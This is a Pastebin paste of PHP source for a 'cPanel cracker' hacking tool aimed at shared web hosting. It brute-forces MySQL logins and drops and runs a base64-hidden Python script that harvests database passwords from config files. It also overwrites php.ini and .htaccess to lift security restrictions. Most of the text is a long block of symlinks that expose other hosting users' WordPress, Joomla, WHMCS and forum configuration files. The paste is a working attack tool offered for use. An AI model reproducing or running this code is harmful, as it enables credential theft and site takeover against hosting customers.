Anasoweb

Cpanel Cracker Auto Prv8

Jul 14th, 2016
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 52.44 KB | None | 0 0
  1. <html>
  2. <title>CPanel TAZBIB | Anasoweb </title>
  3. <?php
  4. /* Recoded By Anasoweb */
  5. @set_time_limit(0);
  6. @error_reporting(0);
  7. $login_time = 3600 * 24 * 7;
  8. $hijau = array("#00FF00", "#006400", "#888888");
  9. $merah = array("#FF0000", "#640000", "#888888");
  10. $biru = array("#0000FF", "#000064", "#888888");
  11. $kuning = array("#FFFF00", "#646400", "#888888");
  12. $cyan = array("#00FFFF", "#006464", "#888888");
  13. $pink = array("#FF00FF", "#640064", "#888888");
  14. $theme = "hijau";
  15. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  16. switch (isset($_GET['x'])) {
  17. case 'green':
  18. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  19. $theme = "hijau";
  20. setcookie("theme", $theme, time() + $login_time);
  21. break;
  22. case 'red':
  23. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  24. $theme = "merah";
  25. setcookie("theme", $theme, time() + $login_time);
  26. break;
  27. case 'blue':
  28. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  29. $theme = "biru";
  30. setcookie("theme", $theme, time() + $login_time);
  31. break;
  32. case 'yellow':
  33. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  34. $theme = "kuning";
  35. setcookie("theme", $theme, time() + $login_time);
  36. break;
  37. case 'cyan':
  38. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  39. $theme = "cyan";
  40. setcookie("theme", $theme, time() + $login_time);
  41. break;
  42. case 'pink':
  43. if (isset($_COOKIE['theme'])) $theme = $_COOKIE['theme'];
  44. $theme = "pink";
  45. setcookie("theme", $theme, time() + $login_time);
  46. break;
  47. }
  48. if ($theme == "hijau") {
  49. $color = $hijau;
  50. } elseif ($theme == "merah") {
  51. $color = $merah;
  52. } elseif ($theme == "biru") {
  53. $color = $biru;
  54. } elseif ($theme == "kuning") {
  55. $color = $kuning;
  56. } elseif ($theme == "cyan") {
  57. $color = $cyan;
  58. } else {
  59. $color = $pink;
  60. }
  61. echo '<head>
  62. <style type="text/css">
  63. <!--
  64. body {
  65. background-color: #000000;
  66. font-family: Verdana;
  67. font-size: 13px;
  68. color: #e1e1e1;
  69. margin:5px;
  70. }
  71. input,textarea,select{
  72. color: ' . $color[0] . ';
  73. font-size: 13px;
  74. border: 1px solid ' . $color[0] . ';
  75. background-color: #080808;
  76. }
  77. input:hover,textarea:hover,select:hover{
  78. color: ' . $color[0] . ';
  79. font-size: 13px;
  80. border: 1px solid ' . $color[0] . ';
  81. background-color: #080808;
  82. }
  83. a {
  84. background-color: #000000;
  85. vertical-align: bottom;
  86. text-decoration: none;
  87. font-size: 13px;
  88. color:' . $color[0] . ';
  89. }
  90. a:hover {
  91. background-color: #080808;
  92. vertical-align: bottom;
  93. text-decoration: none;
  94. font-size: 13px;
  95. color:' . $color[0] . ';
  96. }
  97. .label {
  98. font-size: 13px;
  99. color: #e1e1e1;
  100. padding:3px;
  101. }
  102. td {
  103. border-bottom:2px solid #222222;
  104. background:#222;
  105. }
  106. -->
  107. </style>
  108. </head>
  109. ';
  110. if (isset($_POST['page']) == 'find') {
  111. if (isset($_POST['usernames']) && isset($_POST['passwords'])) {
  112. if ($_POST['type'] == 'passwd') {
  113. $e = explode("
  114. ", $_POST['usernames']);
  115. foreach ($e as $value) {
  116. $k = explode(":", $value);
  117. $username.= $k['0'] . " ";
  118. }
  119. } elseif ($_POST['type'] == 'simple') {
  120. $username = str_replace("
  121. ", ' ', $_POST['usernames']);
  122. }
  123. $a1 = explode(" ", $username);
  124. $a2 = explode("
  125. ", $_POST['passwords']);
  126. $id2 = count($a2);
  127. $ok = 0;
  128. foreach ($a1 as $user) {
  129. if ($user !== '') {
  130. $user = trim($user);
  131. for ($i = 0;$i <= $id2;$i++) {
  132. $pass = trim($a2[$i]);
  133. if (@mysql_connect('localhost', $user, $pass)) {
  134. echo "Noobs ~ User : (<font color='" . $color[0] . "'>$user</font>) Pass : (<font color='" . $color[0] . "'>$pass</font>)<br />";
  135. $ok++;
  136. }
  137. }
  138. }
  139. }
  140. echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><hr noshade size=1>";
  141. echo "<center>[Done] : <font color='" . $color[0] . "'>You Found</font> $ok <font color='" . $color[0] . "'>CPanel,</font> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  142. exit;
  143. }
  144. }
  145. if (isset($_POST['pass']) == 'password') {
  146. error_reporting(0);
  147. mkdir('config', 0755);
  148. $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IFByb2dCb3kNCicnJw0KDQppbXBvcnQgc3lzDQppbXBvcnQgb3MNCmltcG9ydCByZQ0KaW1wb3J0IHN1YnByb2Nlc3MNCmltcG9ydCB1cmxsaWINCmltcG9ydCBnbG9iDQpmcm9tIHBsYXRmb3JtIGltcG9ydCBzeXN0ZW0NCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KICBwcmludCcnJwkNCiBVc2FnZTogJXMgW1VSTC4uLl0gW2RpcmVjdG9yeS4uLl0NCiBFeCkgJXMgaHR0cDovL3d3dy50ZXN0LmNvbS90ZXN0LyBbZGlyIC4uLl0nJycgJSAoc3lzLmFyZ3ZbMF0sIHN5cy5hcmd2WzBdKQ0KICBzeXMuZXhpdCgxKQ0KDQpzaXRlID0gc3lzLmFyZ3ZbMV0NCmZvdXQgPSBzeXMuYXJndlsyXQ0KDQp0cnk6DQogIHJlcSAgPSB1cmxsaWIudXJsb3BlbihzaXRlKQ0KICByZWFkID0gcmVxLnJlYWQoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGYgPSBvcGVuKCcvdG1wL2RhdGEudHh0JywgJ3cnKQ0KICAgIGYud3JpdGUocmVhZCkNCiAgICBmLmNsb3NlKCkNCiAgaWYgc3lzdGVtKCkgPT0gJ1dpbmRvd3MnOg0KICAgIGYgPSBvcGVuKCdkYXRhLnR4dCcsICd3JykgIA0KICAgIGYud3JpdGUocmVhZCkNCiAgICBmLmNsb3NlKCkNCg0KICBpID0gMA0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGYgPSBvcGVuKCcvdG1wL2RhdGEudHh0JywgJ3JVJykNCiAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8bGk+PGEnKSA9PSBUcnVlIDoNCiAgICAgICAgbSA9IHJlLnNlYXJjaChyJyg8YSBocmVmPSIpKC4rW14+XSkoIj4pJywgbGluZSkNCiAgICAgICAgaSArPSAxDQogICAgICAgIGxvY2FsX25hbWUgPSAnJXMvZmlsZSVkLnR4dCcgJSAoZm91dCwgaSkNCiAgICAgICAgcHJpbnQgJ1JldHJpZXZpbmcuLi5cdFx0Jywgc2l0ZSArIG0uZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPGltZycpID09IFRydWU6DQogICAgICAgIG0xID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTEuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMS5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxJTUcnKSA9PSBUcnVlOg0KICAgICAgICBtMiA9IHJlLnNlYXJjaChyJyg8QSBIUkVGPSIpKC4rW14+XSkoIj4pJywgbGluZSkNCiAgICAgICAgaSArPSAxDQogICAgICAgIGxvY2FsX25hbWUgPSAnJXMvZmlsZSVkLnR4dCcgJSAoZm91dCwgaSkNCiAgICAgICAgcHJpbnQgJ1JldHJpZXZpbmcuLi5cdFx0Jywgc2l0ZSArIG0yLmdyb3VwKDIpDQogICAgICAgIHRyeTogIHVybGxpYi51cmxyZXRyaWV2ZShzaXRlICsgbTIuZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3JVJykNCiAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8bGk+PGEnKSA9PSBUcnVlIDoNCiAgICAgICAgbSA9IHJlLnNlYXJjaChyJyg8YSBocmVmPSIpKC4rW14+XSkoIj4pJywgbGluZSkNCiAgICAgICAgaSArPSAxDQogICAgICAgIGxvY2FsX25hbWUgPSAnJXMvZmlsZSVkLnR4dCcgJSAoZm91dCwgaSkNCiAgICAgICAgcHJpbnQgJ1JldHJpZXZpbmcuLi5cdFx0Jywgc2l0ZSArIG0uZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPGltZycpID09IFRydWU6DQogICAgICAgIG0xID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTEuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMS5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxJTUcnKSA9PSBUcnVlOg0KICAgICAgICBtMiA9IHJlLnNlYXJjaChyJyg8QSBIUkVGPSIpKC4rW14+XSkoIj4pJywgbGluZSkNCiAgICAgICAgaSArPSAxDQogICAgICAgIGxvY2FsX25hbWUgPSAnJXMvZmlsZSVkLnR4dCcgJSAoZm91dCwgaSkNCiAgICAgICAgcHJpbnQgJ1JldHJpZXZpbmcuLi5cdFx0Jywgc2l0ZSArIG0yLmdyb3VwKDIpDQogICAgICAgIHRyeTogIHVybGxpYi51cmxyZXRyaWV2ZShzaXRlICsgbTIuZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGNsZWFudXAgPSBzdWJwcm9jZXNzLlBvcGVuKCdybSAtcmYgL3RtcC9kYXRhLnR4dCA+IC9kZXYvbnVsbCcsIHNoZWxsPVRydWUpLndhaXQoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ2RlbCBDOlxkYXRhLnR4dCcsIHNoZWxsPVRydWUpLndhaXQoKQ0KICBwcmludCAnXG4nLCAnLScgKiAxMDAsICdcbicNCiAgaWYgc3lzdGVtKCkgPT0gJ0xpbnV4JzoNCiAgICBmb3Igcm9vdCwgZGlycywgZmlsZXMgaW4gb3Mud2Fsayhmb3V0KToNCiAgICAgIGZvciBmbmFtZSBpbiBmaWxlczoNCiAgICAgICAgZnVsbHBhdGggPSBvcy5wYXRoLmpvaW4ocm9vdCwgZm5hbWUpDQogICAgICAgIGYgPSBvcGVuKGZ1bGxwYXRoLCAncicpDQogICAgICAgIGZvciBsaW5lIGluIGY6DQogICAgICAgICAgc2VjciA9IHJlLnNlYXJjaCAociIoZGJfcGFzc3dvcmQnXSA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICAgIHNlY3IxID0gcmUuc2VhcmNoKHIiKHBhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IxIGlzIG5vdCBOb25lOiAgcHJpbnQgIChzZWNyMS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjIgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMi5ncm91cCgzKSkNCiAgICAgICAgICBzZWNyMyA9IHJlLnNlYXJjaCAociIoZGJwYXNzID0uLikoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgICAgc2VjcjQgPSByZS5zZWFyY2ggKHIiKERCUEFTU1dPUkQgPSAnKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjQgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNC5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I1IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjUuZ3JvdXAoMikpDQogICAgICAgICAgc2VjcjYgPSByZS5zZWFyY2ggKHIiKGRicGFzc3dkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgICAgc2VjcjcgPSByZS5zZWFyY2ggKHIiKG1vc0NvbmZpZ19wYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNyBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I3Lmdyb3VwKDIpKQ0KICAgICAgICBmLmNsb3NlKCkNCiAgaWYgc3lzdGVtKCkgPT0gJ1dpbmRvd3MnOg0KICAgIGZvciBpbmZpbGUgaW4gZ2xvYi5nbG9iKCBvcy5wYXRoLmpvaW4oZm91dCwgJyoudHh0JykgKToNCiAgICAgIGYgPSBvcGVuKGluZmlsZSwgJ3InKQ0KICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgc2VjciA9IHJlLnNlYXJjaCAociIoZGJfcGFzc3dvcmQnXSA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjciBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IuZ3JvdXAoMikpICANCiAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IxIGlzIG5vdCBOb25lOiAgcHJpbnQgIChzZWNyMS5ncm91cCgyKSkNCiAgICAgICAgc2VjcjIgPSByZS5zZWFyY2gociIoREJfUEFTU1dPUkQnKSguLi4pKC4rW14+XSkoJykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICBzZWNyMyA9IHJlLnNlYXJjaCAociIoZGJwYXNzID0uLikoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyMyBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IzLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjQgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNC5ncm91cCgyKSkNCiAgICAgICAgc2VjcjUgPSByZS5zZWFyY2ggKHIiKERCcGFzcyA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgc2VjcjYgPSByZS5zZWFyY2ggKHIiKGRicGFzc3dkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I2Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNyBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I3Lmdyb3VwKDIpKQ0KICAgICAgZi5jbG9zZSgpDQpleGNlcHQgKEtleWJvYXJkSW50ZXJydXB0KToNCiAgcHJpbnQgJ1xuVGhhbmtzIGZvciB1c2luZyBpdCA6RCc=';
  149. $file = fopen("cp.py", "w+");
  150. $write = fwrite($file, base64_decode($cp));
  151. fclose($file);
  152. chmod("cp.py", 0755);
  153. $url = $_POST['url'];
  154. echo "<center>
  155. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
  156. system("python cp.py $url config");
  157. unlink('cp.py');
  158. echo "</textarea>
  159. </center>";
  160. echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  161. exit;
  162. }
  163. if (isset($_POST['matikan']) == 'sekatan') {
  164. @error_reporting(0);
  165. $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
  166. $file = fopen("php.ini", "w+");
  167. $write = fwrite($file, base64_decode($phpini));
  168. fclose($file);
  169. $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
  170. $file = fopen(".htaccess", "w+");
  171. $write = fwrite($file, base64_decode($htaccess));
  172. echo "<body style='background:#000000;color:#ffffff;font-size:17px;font-family:Tahoma,Verdana,Arial;'><br/><center>[Done] : <span style='color:" . $color[0] . ";'>Successfull, </span> <a href=" . $_SERVER['PHP_SELF'] . " style='text-decoration:none;'><input type='button' value='Back !'></a></center></body>";
  173. exit;
  174. }
  175. if (isset($_POST['mendapatkan']) == 'passwd') {
  176. @set_magic_quotes_runtime(0);
  177. ob_start();
  178. error_reporting(0);
  179. @set_time_limit(0);
  180. @ini_set('max_execution_time', 0);
  181. @ini_set('output_buffering', 0);
  182. $fn = $_POST['foldername'];
  183. function syml($usern, $pdomain) {
  184. symlink('/home/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  185. symlink('/home/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  186. symlink('/home/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  187. symlink('/home/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  188. symlink('/home/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  189. symlink('/home/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  190. symlink('/home/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  191. symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  192. symlink('/home/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  193. symlink('/home/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  194. symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  195. symlink('/home/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  196. symlink('/home/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  197. symlink('/home/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  198. symlink('/home/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  199. symlink('/home/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  200. symlink('/home/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  201. symlink('/home/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  202. symlink('/home/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  203. symlink('/home/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  204. symlink('/home/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  205. symlink('/home/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  206. symlink('/home/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  207. symlink('/home/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  208. symlink('/home/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  209. symlink('/home/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  210. symlink('/home/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  211. symlink('/home/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  212. symlink('/home/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  213. symlink('/home/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  214. symlink('/home/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  215. symlink('/home/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  216. symlink('/home/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  217. symlink('/home/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  218. symlink('/home/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  219. symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  220. symlink('/home/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  221. symlink('/home/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  222. symlink('/home/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  223. symlink('/home/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  224. symlink('/home/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  225. symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  226. symlink('/home2/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  227. symlink('/home2/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  228. symlink('/home2/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  229. symlink('/home2/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
  230. symlink('/home2/' . $usern . '/public_html/config/koneksi.php', $pdomain . '~~Lokomedia.txt');
  231. symlink('/home2/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
  232. symlink('/home2/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
  233. symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
  234. symlink('/home2/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
  235. symlink('/home2/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
  236. symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
  237. symlink('/home2/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
  238. symlink('/home2/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
  239. symlink('/home2/' . $usern . '/public_html/wp/wp-config.php', $pdomain . '~~Wordpress3.txt');
  240. symlink('/home2/' . $usern . '/public_html/home/wp-config.php', $pdomain . '~~Wordpress4.txt');
  241. symlink('/home2/' . $usern . '/public_html/main/wp-config.php', $pdomain . '~~Wordpress5.txt');
  242. symlink('/home2/' . $usern . '/public_html/site/wp-config.php', $pdomain . '~~Wordpress6.txt');
  243. symlink('/home2/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
  244. symlink('/home2/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
  245. symlink('/home2/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
  246. symlink('/home2/' . $usern . '/public_html/main/configuration.php', $pdomain . '~~Joomla4.txt');
  247. symlink('/home2/' . $usern . '/public_html/home/configuration.php', $pdomain . '~~Joomla5.txt');
  248. symlink('/home2/' . $usern . '/public_html/site/configuration.php', $pdomain . '~~Joomla6.txt');
  249. symlink('/home2/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
  250. symlink('/home2/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
  251. symlink('/home2/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
  252. symlink('/home2/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
  253. symlink('/home2/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
  254. symlink('/home2/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
  255. symlink('/home2/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
  256. symlink('/home2/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
  257. symlink('/home2/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
  258. symlink('/home2/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~Other1.txt');
  259. symlink('/home2/' . $usern . '/public_html/admin/config.php', $pdomain . '~~Other2.txt');
  260. symlink('/home2/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
  261. symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~Other3.txt');
  262. symlink('/home2/' . $usern . '/public_html/connect.php', $pdomain . '~~Other4.txt');
  263. symlink('/home2/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
  264. symlink('/home2/' . $usern . '/public_html/include/config.php', $pdomain . '~~Other5.txt');
  265. symlink('/home2/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
  266. symlink('/home2/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
  267. symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
  268. symlink('/home3/' . $usern . '/public_html/inc/config.php', $pdomain . '~~MyBB.txt');
  269. symlink('/home3/' . $usern . '/public_html/sites/default/settings.php', $pdomain . '~~Drupal.txt');
  270. symlink('/home3/' . $usern . '/public_html/includes/configure.php', $pdomain . '~~Oscommerce.txt');
  271. symlink('/home3/' . $usern . '/public_html/lib/config.php', $pdomain . '~~Balitbang.txt');
